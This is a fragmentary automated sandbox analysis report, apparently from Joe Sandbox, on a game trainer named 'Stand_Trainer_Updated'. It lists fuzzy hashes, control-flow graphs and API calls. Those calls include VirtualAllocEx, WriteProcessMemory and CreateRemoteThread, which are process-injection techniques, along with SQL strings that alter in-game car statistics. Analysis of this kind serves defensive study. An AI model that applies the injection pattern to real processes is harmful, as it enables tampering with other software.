                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9eff3f172c1612f9b28d5721565baaf548d9dc074905f6a880347a426f87498a
                                                                                      • Instruction ID: 9b2f738864bf42856c58eedd85e82a8e4f82818b804a280aeb3185eb8375bf42
                                                                                      • Opcode Fuzzy Hash: 9eff3f172c1612f9b28d5721565baaf548d9dc074905f6a880347a426f87498a
                                                                                      • Instruction Fuzzy Hash: CD214F6290EBC68FF75BD7384465160BFA09F5330471965EAC08DCB5A2E904980DC392

                                                                                      Control-flow Graph

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ff9ca4f5a7f38476e742817cd2b03e3c373df9e088811b19f2e4d86be0fe48ee
                                                                                      • Instruction ID: e4317ad613d332909f0d8f64ffe7af3e5c63a599bedb0baab1a4510b07018cea
                                                                                      • Opcode Fuzzy Hash: ff9ca4f5a7f38476e742817cd2b03e3c373df9e088811b19f2e4d86be0fe48ee
                                                                                      • Instruction Fuzzy Hash: B9217562D5E6868FF75ED778446A095FFA0EF23210708E1BAC44C8B193EE14A80D87D5

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 647 7ffaac660835-7ffaac66083a 648 7ffaac66083e 647->648 649 7ffaac66083c-7ffaac66083d 647->649 650 7ffaac66083f-7ffaac6608dd 648->650 649->648 649->650 656 7ffaac6608df-7ffaac6608eb call 7ffaac660560 650->656 658 7ffaac6608f0-7ffaac660902 656->658 660 7ffaac660903 658->660 660->660
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 383fc7e304a473ed2c13e0627f488248b8af33ec5a288753555ed3dadcea8d32
                                                                                      • Instruction ID: 78589358b5dcd86910016faa8714b2eb2e77f451631b935b6b9d5ff80549e76b
                                                                                      • Opcode Fuzzy Hash: 383fc7e304a473ed2c13e0627f488248b8af33ec5a288753555ed3dadcea8d32
                                                                                      • Instruction Fuzzy Hash: 65118F9394E7868FF76BD32858760A9BFE4AF56210709A0FFC48C8B193ED04680D87D5

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 661 7ffaac660875-7ffaac66087a 662 7ffaac66087e-7ffaac6608eb call 7ffaac660490 call 7ffaac660560 661->662 663 7ffaac66087c-7ffaac66087d 661->663 675 7ffaac6608f0-7ffaac660902 662->675 663->662 677 7ffaac660903 675->677 677->677
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c66e908460d2b4a2e6bc8c255f7486baebfbbc919ccf8a12cf423ba3166b8c0d
                                                                                      • Instruction ID: d23ba20cbc780dde9dea6ef85bdca7cc64edc5712b06785f0b8e88ae23735a70
                                                                                      • Opcode Fuzzy Hash: c66e908460d2b4a2e6bc8c255f7486baebfbbc919ccf8a12cf423ba3166b8c0d
                                                                                      • Instruction Fuzzy Hash: C7F05B82E4EB8A4AF6AFA27858635FC5F904F56111F0521BBD14D852D7DC48698D03C5

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 678 7ffaac661239 call 7ffaac660810 680 7ffaac66123e-7ffaac66128a call 7ffaac660820 678->680
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2564809953.00007FFAAC660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC660000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffaac660000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db47fe08fe3ab13a332ff20bffaa10780a8467ebde26691ec73ac3901e686a51
                                                                                      • Instruction ID: c57a064629a5d0dfe7941d37384f961c1cd380da14d6e1149b78c63d132a9819
                                                                                      • Opcode Fuzzy Hash: db47fe08fe3ab13a332ff20bffaa10780a8467ebde26691ec73ac3901e686a51
                                                                                      • Instruction Fuzzy Hash: 19F0A762A18A4A4BF649EB2884526F692E5FF54300F00A179914FC2193DC18E5494284

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 687 7ffb22653180-7ffb226531d6 ?_Xlength_error@std@@YAXPEBD@Z 689 7ffb226531dc-7ffb2265320f call 7ffb22654150 687->689 690 7ffb226536aa-7ffb226536d3 call 7ffb22654570 687->690 695 7ffb22653213-7ffb22653216 689->695 696 7ffb22653218-7ffb22653224 695->696 697 7ffb22653226-7ffb22653239 call 7ffb22653f70 695->697 698 7ffb2265323d-7ffb22653247 696->698 697->698 698->695 700 7ffb22653249-7ffb22653265 698->700 702 7ffb2265327d 700->702 703 7ffb22653267-7ffb22653279 call 7ffb22654150 700->703 705 7ffb22653281-7ffb22653284 702->705 703->702 707 7ffb22653294-7ffb226532a7 call 7ffb22653f70 705->707 708 7ffb22653286-7ffb22653292 705->708 709 7ffb226532ab-7ffb226532b5 707->709 708->709 709->705 712 7ffb226532b7-7ffb226532c5 709->712 713 7ffb226532d0-7ffb226532e8 712->713 714 7ffb22653300 713->714 715 7ffb226532ea-7ffb226532fc call 7ffb22654150 713->715 716 7ffb22653304-7ffb22653307 714->716 715->714 719 7ffb22653317-7ffb2265332a call 7ffb22653f70 716->719 720 7ffb22653309-7ffb22653315 716->720 721 7ffb2265332e-7ffb22653338 719->721 720->721 721->716 724 7ffb2265333a-7ffb2265334f 721->724 725 7ffb22653351-7ffb22653363 call 7ffb22654150 724->725 726 7ffb22653367-7ffb2265336b 724->726 725->726 728 7ffb22653370-7ffb22653373 726->728 730 7ffb22653383-7ffb22653396 call 7ffb22653f70 728->730 731 7ffb22653375-7ffb22653381 728->731 733 7ffb2265339a-7ffb226533a4 730->733 731->733 733->728 735 7ffb226533a6-7ffb226533ac 733->735 735->713 736 7ffb226533b2-7ffb226533ce 735->736 737 7ffb226533d0-7ffb226533e2 call 7ffb22654150 736->737 738 7ffb226533e6-7ffb226533ea 736->738 737->738 740 7ffb226533f0-7ffb226533f3 738->740 742 7ffb22653403-7ffb22653416 call 7ffb22653f70 740->742 743 7ffb226533f5-7ffb22653401 740->743 744 7ffb2265341a-7ffb22653424 742->744 743->744 744->740 747 7ffb22653426-7ffb22653438 744->747 748 7ffb22653440-7ffb22653458 747->748 749 7ffb22653470 748->749 750 
7ffb2265345a-7ffb2265346c call 7ffb22654150 748->750 752 7ffb22653474-7ffb22653477 749->752 750->749 754 7ffb22653487-7ffb2265349a call 7ffb22653f70 752->754 755 7ffb22653479-7ffb22653485 752->755 756 7ffb2265349e-7ffb226534a8 754->756 755->756 756->752 759 7ffb226534aa-7ffb226534bf 756->759 760 7ffb226534c1-7ffb226534d3 call 7ffb22654150 759->760 761 7ffb226534d7-7ffb226534db 759->761 760->761 762 7ffb226534e0-7ffb226534e3 761->762 764 7ffb226534f3-7ffb22653506 call 7ffb22653f70 762->764 765 7ffb226534e5-7ffb226534f1 762->765 767 7ffb2265350a-7ffb22653514 764->767 765->767 767->762 770 7ffb22653516-7ffb2265351c 767->770 770->748 771 7ffb22653522-7ffb22653538 770->771 772 7ffb22653550 771->772 773 7ffb2265353a-7ffb2265354c call 7ffb22654150 771->773 775 7ffb22653554-7ffb22653557 772->775 773->772 777 7ffb22653567-7ffb2265357a call 7ffb22653f70 775->777 778 7ffb22653559-7ffb22653565 775->778 779 7ffb2265357e-7ffb22653588 777->779 778->779 779->775 782 7ffb2265358a-7ffb22653594 779->782 783 7ffb226535a2-7ffb226535b6 call 7ffb22653f70 782->783 784 7ffb22653596-7ffb226535a0 782->784 785 7ffb226535ba-7ffb226535c8 783->785 784->785 788 7ffb226535ce-7ffb22653648 call 7ffb22654920 VirtualAllocEx WriteProcessMemory 785->788 789 7ffb226536d4-7ffb22653717 call 7ffb22653f50 785->789 795 7ffb2265366f-7ffb22653672 788->795 796 7ffb2265364a-7ffb2265366e VirtualFreeEx call 7ffb22654918 788->796 797 7ffb22653b32-7ffb22653b5a call 7ffb22654570 789->797 798 7ffb2265371d-7ffb22653725 789->798 795->690 800 7ffb22653674-7ffb22653681 795->800 796->795 804 7ffb22653727-7ffb22653772 ReadProcessMemory memcmp 798->804 805 7ffb22653778-7ffb226537ea call 7ffb226531a0 798->805 801 7ffb2265369f-7ffb226536a5 call 7ffb22654918 800->801 802 7ffb22653683-7ffb22653696 800->802 801->690 802->801 807 7ffb22653698-7ffb2265369e _invalid_parameter_noinfo_noreturn 802->807 804->797 804->805 812 7ffb2265381c-7ffb22653833 805->812 813 7ffb226537ec-7ffb226537f9 805->813 807->801 814 7ffb2265383e 812->814 815 
7ffb22653835-7ffb2265383c 812->815 816 7ffb226537fb-7ffb2265380e 813->816 817 7ffb22653817 call 7ffb22654918 813->817 821 7ffb22653845-7ffb22653879 call 7ffb22653f70 814->821 815->821 818 7ffb22653ae1-7ffb22653ae7 _invalid_parameter_noinfo_noreturn 816->818 819 7ffb22653814 816->819 817->812 823 7ffb22653ae8-7ffb22653af3 call 7ffb22654918 818->823 819->817 826 7ffb2265387b-7ffb22653885 821->826 827 7ffb22653887-7ffb2265389b call 7ffb22653f70 821->827 831 7ffb22653af4-7ffb22653afc 823->831 830 7ffb2265389f-7ffb226538a9 826->830 827->830 833 7ffb226538ab-7ffb226538b5 830->833 834 7ffb226538b7-7ffb226538cb call 7ffb22653f70 830->834 831->797 835 7ffb22653afe-7ffb22653b0f 831->835 836 7ffb226538cf-7ffb226538d9 833->836 834->836 838 7ffb22653b11-7ffb22653b24 835->838 839 7ffb22653b2d call 7ffb22654918 835->839 842 7ffb226538db-7ffb226538e5 836->842 843 7ffb226538e7-7ffb226538fb call 7ffb22653f70 836->843 838->839 840 7ffb22653b26-7ffb22653b2c _invalid_parameter_noinfo_noreturn 838->840 839->797 840->839 846 7ffb226538ff-7ffb22653918 842->846 843->846 848 7ffb22653930 846->848 849 7ffb2265391a-7ffb2265392c call 7ffb22654150 846->849 850 7ffb22653934-7ffb22653937 848->850 849->848 853 7ffb22653947-7ffb2265395a call 7ffb22653f70 850->853 854 7ffb22653939-7ffb22653945 850->854 855 7ffb2265395e-7ffb22653968 853->855 854->855 855->850 857 7ffb2265396a-7ffb2265398a 855->857 859 7ffb226539a2 857->859 860 7ffb2265398c-7ffb2265399e call 7ffb22654150 857->860 862 7ffb226539a6-7ffb226539a9 859->862 860->859 864 7ffb226539ab-7ffb226539b7 862->864 865 7ffb226539b9-7ffb226539cc call 7ffb22653f70 862->865 867 7ffb226539d0-7ffb226539da 864->867 865->867 867->862 869 7ffb226539dc-7ffb226539ed 867->869 870 7ffb226539ef-7ffb22653a01 call 7ffb22654150 869->870 871 7ffb22653a05-7ffb22653a09 869->871 870->871 872 7ffb22653a10-7ffb22653a13 871->872 875 7ffb22653a23-7ffb22653a36 call 7ffb22653f70 872->875 876 7ffb22653a15-7ffb22653a21 872->876 878 7ffb22653a3a-7ffb22653a44 875->878 876->878 
878->872 880 7ffb22653a46-7ffb22653a51 878->880 881 7ffb22653b5b-7ffb22653b6f _CxxThrowException 880->881 882 7ffb22653a57-7ffb22653abb WriteProcessMemory * 2 880->882 882->831 883 7ffb22653abd-7ffb22653aca 882->883 883->823 884 7ffb22653acc-7ffb22653adf 883->884 884->818 884->823
                                                                                      APIs
                                                                                      Strings
                                                                                      • @, xrefs: 00007FFB226535F7
                                                                                      • vector too long, xrefs: 00007FFB22653184
                                                                                      • UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned, xrefs: 00007FFB22653426
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcess$Write_invalid_parameter_noinfo_noreturn$Virtualmemcpy$AllocExceptionFreeReadThrowXlength_error@std@@mallocmemcmp
                                                                                      • String ID: @$UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned$vector too long
                                                                                      • API String ID: 3432736595-2273485850
                                                                                      • Opcode ID: ff04e743a14e27a5f50ae3e48831c4d593fa7fcaafc929ef685421284231d40a
                                                                                      • Instruction ID: b2bf602e454535d3c4ad2bde3d96165393cc0b15933a12835c1153c1dba7ff46
                                                                                      • Opcode Fuzzy Hash: ff04e743a14e27a5f50ae3e48831c4d593fa7fcaafc929ef685421284231d40a
                                                                                      • Instruction Fuzzy Hash: A6524DA3A25A9589FB12CF75DC402EC2770FB18B88F484532EA5DA7B99DF78D561C300

                                                                                      Control-flow Graph

Control-flow graph (rendered edge list omitted): function starting at 7ffb22651910; its basic blocks call VirtualAllocEx, WriteProcessMemory (three times), CreateRemoteThread, WaitForSingleObject, VirtualFreeEx and _invalid_parameter_noinfo_noreturn.
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Virtual$AllocFreeMemoryProcessWrite$_invalid_parameter_noinfo_noreturnmemcpy$CreateObjectRemoteSingleThreadWaitmalloc
                                                                                      • String ID: @
                                                                                      • API String ID: 359211796-2766056989
                                                                                      • Opcode ID: 923724aed1add0c9db85f855cc3076c4de2bc1b638331ad5104b5904c44cb73a
                                                                                      • Instruction ID: 409770c130ee13553cd6b376b842901b220ccd87c303ad2dd2e9351a49c50f80
                                                                                      • Opcode Fuzzy Hash: 923724aed1add0c9db85f855cc3076c4de2bc1b638331ad5104b5904c44cb73a
                                                                                      • Instruction Fuzzy Hash: 97C168B2714B8185EB12CF62EC402AD73A5FB88B88F458136DE9D97B68CF78D565C340
                                                                                      APIs
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$MemoryProcessRead
                                                                                      • String ID:
                                                                                      • API String ID: 1606301450-0
                                                                                      • Opcode ID: 5ae2e6b79edec0f3968cffdec89c313936049c9e9988ad8e25bec2b751d6e6f8
                                                                                      • Instruction ID: d310d2f8c3c000c01156dd1c7d76032f474dea290a28d0779fcc19550706ad3a
                                                                                      • Opcode Fuzzy Hash: 5ae2e6b79edec0f3968cffdec89c313936049c9e9988ad8e25bec2b751d6e6f8
                                                                                      • Instruction Fuzzy Hash: A82248B2B18A829AFB06CF74DC442ED33A1FB4478CF40452AEA5D57B99CEB8D159C340
                                                                                      APIs
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 313767242-0
                                                                                      • Opcode ID: 90f41556a7343738b2213ee9ee7f69b153d5a3b61cd0325a1c433d6b6fd49eb8
                                                                                      • Instruction ID: b5b2b015f4f55086f2d91ec9e0c0e0d348cdbdd9b1b3f0baa75edfaffa09ef9f
                                                                                      • Opcode Fuzzy Hash: 90f41556a7343738b2213ee9ee7f69b153d5a3b61cd0325a1c433d6b6fd49eb8
                                                                                      • Instruction Fuzzy Hash: 23313BB3619AC189FB629F70EC443ED6360FB84744F444039DA4E87A94EF78D558C714
                                                                                      Strings
                                                                                      • @, xrefs: 00007FFB226535F7
                                                                                      • UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned, xrefs: 00007FFB22653426
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: @$UPDATE %s SET TopSpeed=%f, DistanceDriven=%u, TimeDriven=%u, TotalWinnings=%u, TotalRepairs=%u, NumPodiums=%u, NumVictories=%u, NumRaces=%u, NumOwners=%u, NumTimesSold=%u, TimeDrivenInRoadTrips=%u, CurOwnerNumRaces=%u, CurOwnerWinnings=%u, NumSkillPointsEarned
                                                                                      • API String ID: 3510742995-1189540536
                                                                                      • Opcode ID: 4d45d62620878725b11631fcb973c50a749d28f5e7bf7a6448b0e22a4ade31d5
                                                                                      • Instruction ID: 794e3c8991c73a811bde3f6f7d983ed3293e0a12e259364c7b5fef88be0184b6
                                                                                      • Opcode Fuzzy Hash: 4d45d62620878725b11631fcb973c50a749d28f5e7bf7a6448b0e22a4ade31d5
                                                                                      • Instruction Fuzzy Hash: 99D16E63B25AE588FB13CB71EC401AC6BB0BB05B98B485131DE5DABB59DF78D562C300
                                                                                      APIs
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                      • String ID:
                                                                                      • API String ID: 2933794660-0
                                                                                      • Opcode ID: e09f90a87769b6277c11b38b7254214313cb37ebbb0d261935752cdcce18699c
                                                                                      • Instruction ID: 21f53d3ab74d9b966e1e9a091180aae6bb1ce0066b2f8b8817c34411eb087da4
                                                                                      • Opcode Fuzzy Hash: e09f90a87769b6277c11b38b7254214313cb37ebbb0d261935752cdcce18699c
                                                                                      • Instruction Fuzzy Hash: A0112E62614F818AEB528F70EC552A933A4FB19758F441A31EA6D87B94DF7CD1A4C340

                                                                                      Control-flow Graph

Control-flow graph (rendered edge list omitted): function starting at 7ffb22652230; its basic blocks call CreateToolhelp32Snapshot, Process32First, Process32Next, strcpy_s, free, GetForegroundWindow, GetWindowThreadProcessId and _invalid_parameter_noinfo_noreturn.
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32Windowstrcpy_s$CreateFirstForegroundNextProcessSnapshotThreadToolhelp32_invalid_parameter_noinfo_noreturnfree
                                                                                      • String ID: focus$reset$unfocus
                                                                                      • API String ID: 64550660-3106794205
                                                                                      • Opcode ID: e7c99580bd7c60a15c07992298f68fdcd850852949cf6604d91e12ff0a8fd0d3
                                                                                      • Instruction ID: 0412e1fc3d3941ff25e94b38e0d65f1ebdf5835588dcd4cba458fcc6d00bd14d
                                                                                      • Opcode Fuzzy Hash: e7c99580bd7c60a15c07992298f68fdcd850852949cf6604d91e12ff0a8fd0d3
                                                                                      • Instruction Fuzzy Hash: 186160A3A286C285FB538B35EC4437973A0FB48B94F448135D98D866A5DFFCE4A4C740
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: MemoryProcessWrite$memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                                                                      • String ID: AND NotAvailableInAutoshow=0$ AND NotAvailableInAutoshow=1
                                                                                      • API String ID: 2427741960-1967300337
                                                                                      • Opcode ID: 50c7807b714074bc3cde8963075cd9d3c8a6124ba4fd18cff7efebee71432e17
                                                                                      • Instruction ID: 1ad80dfc8962176b4727639a4afb0ae508874e5648bccbdf1180454f01d29673
                                                                                      • Opcode Fuzzy Hash: 50c7807b714074bc3cde8963075cd9d3c8a6124ba4fd18cff7efebee71432e17
                                                                                      • Instruction Fuzzy Hash: 2E51C3A3B28AC684FA279B25DD042B92760FB44FD4F540571CA6D87BA5DFBCE461C300
                                                                                      APIs
                                                                                      Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
                                                                                      Similarity
                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                      • String ID:
                                                                                      • API String ID: 349153199-0
                                                                                      • Opcode ID: 5dc3a2c061d603ebea0dc15b17bef94147f44fca3a790ac9016eac81c12b021b
                                                                                      • Instruction ID: 11b0bdcc59fc85c60e692dba87c5eea19ed5fa9dbf9d4d9bf3d4ab403a42750d
                                                                                      • Opcode Fuzzy Hash: 5dc3a2c061d603ebea0dc15b17bef94147f44fca3a790ac9016eac81c12b021b
                                                                                      • Instruction Fuzzy Hash: 7F818BA3E3C6C386F6939F75DC812792290BF85784F144175E94CE7B96DEACE8618700
APIs
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: MemoryProcess$Read$Write
• String ID:
• API String ID: 2601675199-0
• Opcode ID: 7ee7c050f7f7f51261b789aad5b224ef0e50c02b930656cee03c470f5aaca468
• Instruction ID: 8c1652e89e8bfc26271643130190a85ec43f0174c449b967837e538aab324ea2
• Opcode Fuzzy Hash: 7ee7c050f7f7f51261b789aad5b224ef0e50c02b930656cee03c470f5aaca468
• Instruction Fuzzy Hash: AE51DBB7716FD689EB918F25DC406997320FB98B89F445122EE4E93B28DF78C195C340
APIs
Memory Dump Source
• Source File: 00000006.00000002.2565287694.00007FFB22651000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFB22650000, based on PE: true
• Associated: 00000006.00000002.2565258698.00007FFB22650000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565374161.00007FFB22656000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565423567.00007FFB22658000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000006.00000002.2565454500.00007FFB22659000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ffb22650000_Stand_Trainer_Updated.jbxd
Similarity
• API ID: memcpy$memset$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
• String ID:
• API String ID: 1738635707-0
• Opcode ID: 90702b10806ec90035e6f9983b6b7e09ddf27c14c661ce296dfff093e261c8fb
